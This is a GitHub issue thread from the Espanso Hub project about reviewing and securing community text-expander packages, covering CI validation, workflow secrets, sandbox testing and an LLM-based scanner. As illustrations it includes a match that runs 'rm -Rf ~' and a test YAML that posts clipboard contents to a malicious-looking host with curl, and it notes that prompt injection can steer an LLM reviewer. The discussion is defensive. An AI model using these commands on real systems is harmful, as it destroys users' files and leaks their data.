federico-terzi commented 9 months ago

Hi all!

I'm writing this issue to align all the team and contributors on the current state of the Espanso Hub. Hopefully, this will give everyone enough context to participate in the discussion.

The core principle that motivates many of the choices detailed below is: Security should be a top priority.

Current state

The Espanso Hub is currently stuck. The last package was merged 9 months ago, and we have >20 packages waiting to be reviewed and merged. This is my fault and I'm sorry about it, I became a bottleneck because I'm (currently) the only one with permission to approve and merge packages, and I've been unable to dedicate time to it in the past few months.

Motivation

The community raised some really valid points in https://github.com/espanso/espanso/issues/1742, which I'll try to address here

Why can't package authors update their packages independently? That would speed up the process

Nothing would stop a package maintainer from publishing a good looking package, and then publishing an update that contains a match like:

  - trigger: "a"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: "rm -Rf ~"

so that as soon as the user types a, all their files are gone. Script and shell extensions are particularly dangerous.

On one hand, I'm against walled gardens (like Apple's AppStore), but on the other, I'd love to maintain the user expectation that every package they download from the Hub is vetted and safe. There are approaches to mitigate the effort (like improving automatic checks), but removing the review process (even for known package creators) could lead to dangerous packages being released. Keeping in mind that users can still share their packages with others outside the Hub, I still believe that this model is better (although scaling the reviewers team is for sure necessary, because I'm definitely a bottleneck here)

Seems to me you just gave excellent reasons for excluding script and shell extensions from the hub, on principle.

Excluding shell and script extensions is an option, but would limit the usefulness of many packages currently available in the Hub. Examples:

Proper human reviews are the only solution I can think of to allow those useful packages without posing a security risk for users

Maybe create a CI that validates the packages?

We already do: https://github.com/espanso/hub/tree/main/.github/scripts/validate There's a list of rules currently being checked, and when run, they verify that the package satisfies a set of must-have conditions. Unfortunately, there's a significant problem with the current approach, and again, it's motivated by security.

A bit of context:

Every time a package is merged on the main branch, a Github Action pushes it on the hub-frontend: https://github.com/espanso/hub-frontend so that it can be displayed in the Hub This action is a sensitive operation, because it requires a token that grants write access to the Espanso Hub

If you want to run GitHub actions against PRs opened by external contributors, things get tricky. If permissions are not configured correctly, a malicious user could modify the GitHub actions configuration as part of the PR and extract secrets (for more information, see: https://github.blog/2020-08-03-github-actions-improvements-for-fork-and-pull-request-workflows/#improvements-for-public-repository-forks). At the time, I went with the easiest solution that also guaranteed good security: on each new PR, I would manually review that the PR did not change the GitHub actions configuration, and then approve the workflow manually. Clearly, this does not scale very well.

A solution to allow automated workflows while also guaranteeing good security exists, but it takes time to configure correctly, and unfortunately I didn't have capacity in the past few months. See: https://securitylab.github.com/research/github-actions-preventing-pwn-requests/

Reality check: How does Maven Central do it? Or PyPi? Or Rubygems? Or sdkman? Or GitHub Packages?

That's a good question. Due to the nature of Espanso, most users are fairly technical. That said, downloading a package from PyPi and from Espanso might trigger different expectations: when you download a python package, you are downloading an executable, which is dangerous by nature. For many users, Espanso packages might seem safer (most of them are just string replacements after all), and with the Hub, I wouldn't want to break this expectation. If a package is on the Hub, it should be safe to run (dangerous packages can be hosted in external repositories, if necessary)

Thoughts?

cc @AucaCoyan @smeech

DylanLacey commented 9 months ago

Repo Security

The pull_request_target action doesn't provide a lot of security; For instance, you can't actually check out the PR's code because that gives it arbitrary access to do whatever it wants. What we could do is:

Use the PR details to grab the yaml file via the Github API
Run the validator over the yaml
Check whether the PR intends to change the Github actions in any way and reject if so
Use workflow_run to label the PR as having valid yaml

That doesn't, however, help with user security.

User Security

Automated Reviews

Something I've been playing around with; we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for triggers. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.

We'd be able to automatically reject anything too heinous (attempts to mess with ~/.ssh directories, rm whatever) and provide maintainers with nice reports:

Package: Dylan's Sneaky Exfiltrator	trigger	files	network
e	REMOVED /usr/var/important.rc
McDonalds		POST https://dodgyhacker.io/pwnd

Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there.

This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.

Manual Reviews

That same bot could let maintainers throw arbitrary input at packages under investigation, without having to install the package and hope they've not missed anything.

DylanLacey commented 9 months ago

Also, it's probably worth publishing a denylist for scripts and content, just to keep things obvious. And yeah, maybe if the policy disallows (say) messing with hidden folders in the user's home directory it'll mean some neat packages don't get approved, but It's easier to reject a package for violating clear rules.

Contentwise, I like the Contributor Covenant as a code of conduct; Espanso could adopt it and then assess packages based on whether the replacements therein would violate the covenant if said in a Github issue.

AucaCoyan commented 9 months ago

I haven't had the chance to read the Contributor covenant before, I find it very thorough! So, this problem transformed from: "we don't have a way to systematically process all the packages" to "we just need contributors and a tool that catches the most obvious malicious scripts", right? This is a people problem, not a system problem.

smeech commented 9 months ago

Scripts and command-line expansions will need particular care. Are there any dangers of regular expansions? Just damaging phrases one would prefer to avoid pasting into terminal, I suppose - less risky but preferably avoided. Can one search the packages and PRs code?

dmwyatt commented 8 months ago

Idea

Consider integrating an LLM for first-pass security checks. Every major LLM easily warns that this is bad:

  - trigger: "a"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: "rm -Rf ~"

You might have an automated process that submits packages to some LLM that creates a first-pass report for triage.

Here's a prompt I just tried on a half dozen different LLMs:

TEST LLM PROMPT

 You are an expert at evaluating code for security issues.  You are being used to evaluate YAML files for the `espanso` text expander utility and must warn if the provided YAML is or is not a security risk for users who import the YAML into their own `espanso` configurations. You will be provided the YAML content without any other context and you must respond with JSON and ONLY JSON. The JSON must have two keys: 

* A boolean key `"is_security_risk"`
* A text key `"security_risk_explanation"`

## Example input

  - trigger: "a"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: "rm -Rf ~"

## Example evaluation output

{
"is_security_risk": true,
"security_risk_explanation": "The provided YAML contains a shell command that is a significant security risk. The command 'rm -Rf ~' is used to delete all files and directories in the user's home directory. If this YAML is imported into an espanso configuration, it could potentially lead to data loss when the trigger 'a' is activated."
}

Test YAML:

- trigger: "email"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: "curl -X POST -d \"email={{clipboard}}\" http://malicious-server.com/collect"

You can test it against a bunch of different models here.

Maybe have new PRs run a GitHub Action that submits to an LLM, parses the output, and sends it on to Discord.

AucaCoyan commented 8 months ago

I like that! We would need a PR just to know how it works. I'm busy with other stuff, can anyone else take it? 😄

federico-terzi commented 8 months ago

Hey folks!

Sorry for the late reply, adding some thoughts to the thread:

re @DylanLacey

Repo Security

The pull_request_target action doesn't provide a lot of security; For instance, you can't actually check out the PR's code because that gives it arbitrary access to do whatever it wants. What we could do is:

Use the PR details to grab the yaml file via the Github API

Run the validator over the yaml

Check whether the PR intends to change the Github actions in any way and reject if so

Use workflow_run to label the PR as having valid yaml

Yes, this is what I had in mind (based on https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). Ideally, this workflow would:

Always run the validators over the YAML
label a PR as "dangerous" if it contains scripts/shell extensions, so that a human reviewer can take a better look

The workflow would not automatically approve PRs. I think there are too many opportunities for it to be exploited without a human review

User Security

Automated Reviews

Something I've been playing around with; we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for triggers. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.

We'd be able to automatically reject anything too heinous (attempts to mess with ~/.ssh directories, rm whatever) and provide maintainers with nice reports:

Package: Dylan's Sneaky Exfiltrator

trigger files network e REMOVED /usr/var/important.rc
McDonalds POST https://dodgyhacker.io/pwnd Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there.

This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.

This sounds interesting but probably overly complex/brittle. Having automatic validation + an increased team of reviewers would very likely solve the problem :)

re @dmwyatt

Using LLMs as a (first pass) security is an interesting approach, but I'd personally avoid it for two reasons:

It's very easy for an attacker to steer the LLM into providing a green check on malware using Prompt injection. Rule-based heuristics should be preferred as they are more deterministic and reliable
LLMs could end up costing the project a lot of money, which is not sustainable given the open nature of Espanso. Also, attackers could spam our PRs to make us consume a lot of LLM tokens, making it very easy to abuse

Thoughts?

dmwyatt commented 8 months ago

With regards to LLM evaluation:

I would not rely upon LLMs as your sole barrier before publishing a new package. I certainly wouldn't use an LLM instead of other heuristics. I would use them in addition. Given the amount of resources available for a developing a robust heuristics-based solution I would put about the same amount of confidence in LLMs as I would in the heuristics solution.

With regards to cost (speaking in USD here), at least OpenAI lets you set a price limit via your account dashboard. The above prompt is 300 tokens. A typical response is around 90 tokens. gpt-3.5-turbo is $0.50 / 1 million tokens for input and $1.50 per million tokens for output.

If I did my math right, a single prompt with response will cost $0.000285. In other words $1 will get you 3,508 package evaluations given the prompt above. That's a small package...might want to average the size of all the existing packages to get a better estimate? You could also make sure the workflow just doesn't call the API for larger packages if you want to control costs even more.

Though, I certainly wouldn't hold it against anyone if they didn't want to spend any money at all on something like this that you're not getting any money out of!

(Actually also could look into seeing if we can't get a local LLM running on a GH Action runner)

AucaCoyan commented 8 months ago

Yeah, I agree with dmwyatt here. We can use it as another check, not necessarily as the only of automatic check. In any scenario we are accepting that we need more contributors, so why not have some CI to make the work easier? I know it's not perfect to depend on LLMs, but it's a plus to hard-coded rules. A friend of mine recently told me: "In open source, you should not debate if you ought to do or do not do something, you should plainly do it. The communty will either praise or judge you for the results" 😆 and he is very much on point, I see we are turning around in circles. Can we agree on a plan to move forward? It doesn't need to be perfect... it will never be!

AucaCoyan commented 7 months ago

Hello dear reader! We recently meet in Discord and talked about the subject. It's not completely solved, but at least we could agree on a few guidelines. To be clear to the community about the implications of using scripts in the hub it needs a Contributing.md file specifying the who and the how the packages are revised, so they meet our expectations before making a PR. This document should include:

we have a CI that does some easy ground checks
we double check every PR with a maintainer, just to be sure no mistakes are made
we don't merge anything we don't understand
we possibly reject packages that cause permanent damage to the system (for example commands that do rm -f) to prevent users of that packages to mistakenly cause trouble on their pcs.
depending in a case by case scenario, we might allow to accept removing files in certain folders, for example temp
even if the package does not contain scripts, it needs a human reviewer nonetheless: it might have content that we don't want to be part of distributing, such as offensive/hateful language or images

espanso / hub

Discussion on the status of Espanso Hub, and next steps #98

Current state

Motivation

Repo Security

User Security

Automated Reviews

Manual Reviews

Idea

TEST LLM PROMPT

Repo Security

User Security

Automated Reviews